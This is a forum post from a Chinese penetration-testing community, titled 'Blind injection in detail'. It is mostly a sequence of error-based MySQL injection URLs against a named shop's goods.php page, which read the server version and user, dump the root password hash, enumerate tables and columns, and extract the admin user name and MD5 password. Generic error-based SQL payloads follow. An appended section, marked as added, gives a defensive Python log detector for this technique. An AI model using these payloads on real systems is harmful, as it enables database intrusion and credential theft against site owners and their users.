中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Blind injection in detail

Author: admin    Time: 2012-9-5 14:59
Determining the version number
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Determining the operating system
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current user()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root hash
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Table names in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

user_name column in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
password column in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Obtaining the admin passwd (md5)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Error-based injection
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
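From the defender's side, as an added example that is not part of the original post: a small Python detector that URL-decodes the request target of each access-log line and flags the combination every payload above relies on, floor(rand()*2) with group by and count(*) (the duplicate-key error trick), plus the metadata sources it reads. The log lines and indicator names are constructed here for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Indicators of the duplicate-key error-based technique shown in the post,
# plus the metadata it is typically used to read (constructed names).
INDICATORS = {
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "group_by": re.compile(r"group\s+by", re.I),
    "count_star": re.compile(r"count\s*\(\s*\*\s*\)", re.I),
    "info_schema": re.compile(r"information_schema\.", re.I),
    "sysvar": re.compile(r"@@\w+"),
    "comment_tail": re.compile(r"(#|--\s|/\*)\s*$"),
}

def normalise(raw_url: str) -> str:
    """Decode the query string twice (catches double encoding) and squash whitespace."""
    query = urlsplit(raw_url).query
    decoded = unquote_plus(unquote_plus(query))
    return " ".join(decoded.split())

def score_request(raw_url: str) -> list[str]:
    """Names of the indicators present in one request; an empty list means clean."""
    text = normalise(raw_url)
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def is_error_based_sqli(raw_url: str) -> bool:
    """The duplicate-key trick needs rand/floor, group by AND count(*) together;
    any one of them alone is common in legitimate parameters."""
    hits = set(score_request(raw_url))
    return {"rand_floor", "group_by", "count_star"} <= hits

# Constructed sample access-log request lines (not taken from the original post).
SAMPLE_LOG = [
    "GET /goods.php?id=352&wsid=1 HTTP/1.1",
    "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version),"
    "0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x"
    "%20limit%201)%23 HTTP/1.1",
    "GET /search.php?q=group%20by%20price HTTP/1.1",
]

def scan_log(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Return (request_target, indicators) for every line flagged as error-based SQLi."""
    flagged = []
    for line in lines:
        parts = line.split()
        if len(parts) < 2:
            continue  # malformed line, skip it
        if is_error_based_sqli(parts[1]):
            flagged.append((parts[1], score_request(parts[1])))
    return flagged
```

Only the second constructed line is flagged; the legitimate "group by price" parameter trips one indicator but not the three-way combination.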




Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2